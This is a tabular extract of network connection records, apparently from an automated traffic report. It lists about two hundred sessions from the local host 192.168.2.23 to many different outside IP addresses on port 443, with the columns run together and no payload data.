                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10163192.168.2.235383643.157.174.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10164192.168.2.234218852.181.133.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10165192.168.2.233706062.164.155.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10166192.168.2.2335540145.143.24.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10167192.168.2.2357012120.169.0.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10168192.168.2.2347864195.101.59.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10169192.168.2.2340304188.51.161.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10170192.168.2.2336130137.82.29.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10171192.168.2.2337394199.47.99.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10172192.168.2.2341286113.76.12.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10173192.168.2.2334666184.209.188.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10174192.168.2.2339386176.128.228.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10175192.168.2.2332880154.19.199.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10176192.168.2.2356130170.223.99.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10177192.168.2.234364812.126.157.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10178192.168.2.2351608176.20.242.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10179192.168.2.2346338211.175.39.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10180192.168.2.2334978159.44.64.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10181192.168.2.2360910176.206.194.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10182192.168.2.234217218.182.162.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10183192.168.2.2351576147.141.156.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10184192.168.2.2342588157.109.127.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10185192.168.2.2355700180.19.5.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10186192.168.2.235876447.104.196.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10187192.168.2.2356308201.170.254.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10188192.168.2.2339252101.201.86.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10189192.168.2.2338622126.137.255.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10190192.168.2.2340364206.192.227.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10191192.168.2.235608275.201.115.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10192192.168.2.2358410106.192.206.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10193192.168.2.235352042.65.178.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10194192.168.2.2344702136.204.90.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10195192.168.2.2342144208.180.132.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10196192.168.2.235055644.199.143.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10197192.168.2.2351088113.112.135.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10198192.168.2.234034466.85.219.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10199192.168.2.2360054219.59.7.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10200192.168.2.235756232.138.138.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10201192.168.2.234462294.68.182.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10202192.168.2.2357704201.93.110.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10203192.168.2.2341132124.124.78.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10204192.168.2.234601488.5.205.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10205192.168.2.233972634.106.189.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10206192.168.2.234553835.158.201.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10207192.168.2.234740084.120.131.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10208192.168.2.233298493.161.242.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10209192.168.2.234015284.173.16.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10210192.168.2.2359880110.55.211.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10211192.168.2.236027852.155.200.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10212192.168.2.2333762161.143.151.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10213192.168.2.235557265.178.9.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10214192.168.2.233998098.0.56.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10215192.168.2.233309695.68.0.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10216192.168.2.2335214128.195.236.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10217192.168.2.2354796150.44.31.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10218192.168.2.2347424124.235.246.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10219192.168.2.235751883.230.54.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10220192.168.2.2346740114.40.101.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10221192.168.2.235483870.166.151.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10222192.168.2.2336244146.12.236.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10223192.168.2.2334126163.161.243.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10224192.168.2.235722083.67.87.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10225192.168.2.233819243.54.200.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10226192.168.2.2353838148.69.77.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10227192.168.2.2339148184.134.45.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10228192.168.2.2337568200.74.151.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10229192.168.2.2339886160.171.163.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10230192.168.2.235483292.249.102.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10231192.168.2.234443295.210.111.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10232192.168.2.2335506150.125.252.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10233192.168.2.234468078.238.252.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10234192.168.2.235264013.253.202.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10235192.168.2.234656080.31.193.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10236192.168.2.2348986199.81.161.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10237192.168.2.2334786220.183.54.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10238192.168.2.2350480147.109.230.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10239192.168.2.235836289.145.253.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10240192.168.2.2346152134.68.89.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10241192.168.2.235580485.11.95.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10242192.168.2.2353472153.66.87.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10243192.168.2.2343686210.232.4.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10244192.168.2.235547684.141.106.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10245192.168.2.2344778147.122.184.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10246192.168.2.2337126147.149.45.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10247192.168.2.235610054.8.98.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10248192.168.2.2355944103.43.125.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10249192.168.2.234427068.21.176.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10250192.168.2.2352874210.184.203.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10251192.168.2.2346870184.11.47.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10252192.168.2.2333474200.31.242.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10253192.168.2.234683651.128.103.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10254192.168.2.2354380189.209.49.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10255192.168.2.2359512161.71.134.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10256192.168.2.2354792190.162.75.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10257192.168.2.233415089.192.103.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10258192.168.2.2345728122.207.102.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10259192.168.2.2336790199.50.46.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10260192.168.2.2356638192.97.190.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10261192.168.2.235773244.169.42.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10262192.168.2.2334850120.225.97.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10263192.168.2.235630078.156.204.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10264192.168.2.236073484.56.41.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10265192.168.2.2349654188.227.81.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10266192.168.2.2338414202.59.86.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10267192.168.2.2338394140.155.69.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10268192.168.2.2355750146.20.226.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10269192.168.2.2359208183.237.112.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10270192.168.2.235028649.76.110.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10271192.168.2.235277213.83.209.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10272192.168.2.2360336146.172.89.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10273192.168.2.2345786123.52.96.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10274192.168.2.2358366116.67.23.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10275192.168.2.235325069.207.172.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10276192.168.2.2337418111.77.127.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10277192.168.2.2352126166.82.188.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10278192.168.2.2359854113.231.73.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10279192.168.2.235428484.73.196.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10280192.168.2.233626269.225.208.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10281192.168.2.2336266198.216.224.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10282192.168.2.2347254180.22.100.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10283192.168.2.233560843.24.145.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10284192.168.2.2344358178.219.111.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10285192.168.2.2338650202.114.39.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10286192.168.2.2353762206.61.184.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10287192.168.2.2340630204.41.168.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10288192.168.2.235139247.39.33.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10289192.168.2.2349442139.78.197.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10290192.168.2.2356674179.110.148.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10291192.168.2.2336640122.195.20.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10292192.168.2.234408414.193.100.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10293192.168.2.235596874.146.89.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10294192.168.2.235609457.116.182.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10295192.168.2.2340560200.240.98.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10296192.168.2.2344502178.39.219.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10297192.168.2.2355740203.150.161.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10298192.168.2.2334820180.44.71.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10299192.168.2.233399068.201.194.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10300192.168.2.2337226152.35.177.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10301192.168.2.2350108103.20.251.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10302192.168.2.2336272107.109.197.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10303192.168.2.2334418160.251.48.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10304192.168.2.235685037.211.32.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10305192.168.2.2342796211.74.92.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10306192.168.2.2356002113.49.210.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10307192.168.2.2353348203.34.87.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10308192.168.2.2338144139.51.172.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10309192.168.2.2344044194.214.241.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10310192.168.2.2337944123.174.222.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10311192.168.2.235745024.25.52.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10312192.168.2.2340972216.187.170.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10313192.168.2.235307674.180.92.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10314192.168.2.2348626149.153.80.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10315192.168.2.235421243.103.112.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10316192.168.2.2353258178.106.106.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10317192.168.2.233318074.137.188.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10318192.168.2.2338956146.1.142.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10319192.168.2.236085841.114.92.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10320192.168.2.2360616120.67.68.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10321192.168.2.2343228183.201.133.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10322192.168.2.234473885.190.118.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10323192.168.2.2347914155.148.28.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10324192.168.2.2354056159.14.169.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10325192.168.2.234251273.192.244.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10326192.168.2.2358724197.135.83.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10327192.168.2.2356652142.20.144.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10328192.168.2.234196076.115.43.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10329192.168.2.236060474.170.125.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10330192.168.2.2352540110.61.49.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10331192.168.2.234888873.8.168.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10332192.168.2.2339076155.212.229.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10333192.168.2.2356432159.15.147.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10334192.168.2.2341330176.233.250.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10335192.168.2.233558013.224.26.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10336192.168.2.2340320191.212.228.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10337192.168.2.2350162130.127.55.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10338192.168.2.235706448.254.88.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10339192.168.2.233763435.117.214.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10340192.168.2.2357030139.123.198.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10341192.168.2.235066865.246.71.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10342192.168.2.2353252122.11.28.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10343192.168.2.233285668.41.214.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10344192.168.2.235318068.147.57.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10345192.168.2.2340860126.183.239.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10346192.168.2.2340270219.229.255.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10347192.168.2.2352858186.213.148.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10348192.168.2.235495489.63.67.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10349192.168.2.234774841.102.114.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10350192.168.2.2342098221.90.124.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10351192.168.2.2347702182.41.55.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10352192.168.2.235310243.244.138.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10353192.168.2.234921483.132.168.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10354192.168.2.2344486140.94.226.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10355192.168.2.233711868.149.31.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10356192.168.2.2333556113.99.251.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10357192.168.2.233467662.99.84.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10358192.168.2.235319441.206.35.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10359192.168.2.234578891.147.127.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10360192.168.2.2356720202.68.26.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10361192.168.2.2350324150.129.187.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10362192.168.2.2359716133.207.1.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10363192.168.2.2344292112.39.106.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10364192.168.2.234019454.143.57.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10365192.168.2.2333672177.91.184.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10366192.168.2.233832063.233.160.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10367192.168.2.2339130191.18.212.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10368192.168.2.2356714155.178.138.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10369192.168.2.2338364109.246.80.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10370192.168.2.2344708203.183.159.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10371192.168.2.2344356207.48.156.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10372192.168.2.2342160203.42.2.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10373192.168.2.2350998103.248.25.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10374192.168.2.2354640173.244.235.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10375192.168.2.234378434.136.212.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10376192.168.2.233440058.114.238.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10377192.168.2.234875667.51.159.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10378192.168.2.2359966213.215.25.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10379192.168.2.2354748103.174.35.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10380192.168.2.233437464.240.173.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10381192.168.2.2357274144.217.74.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10382192.168.2.234521038.86.198.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10383192.168.2.235062445.9.44.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
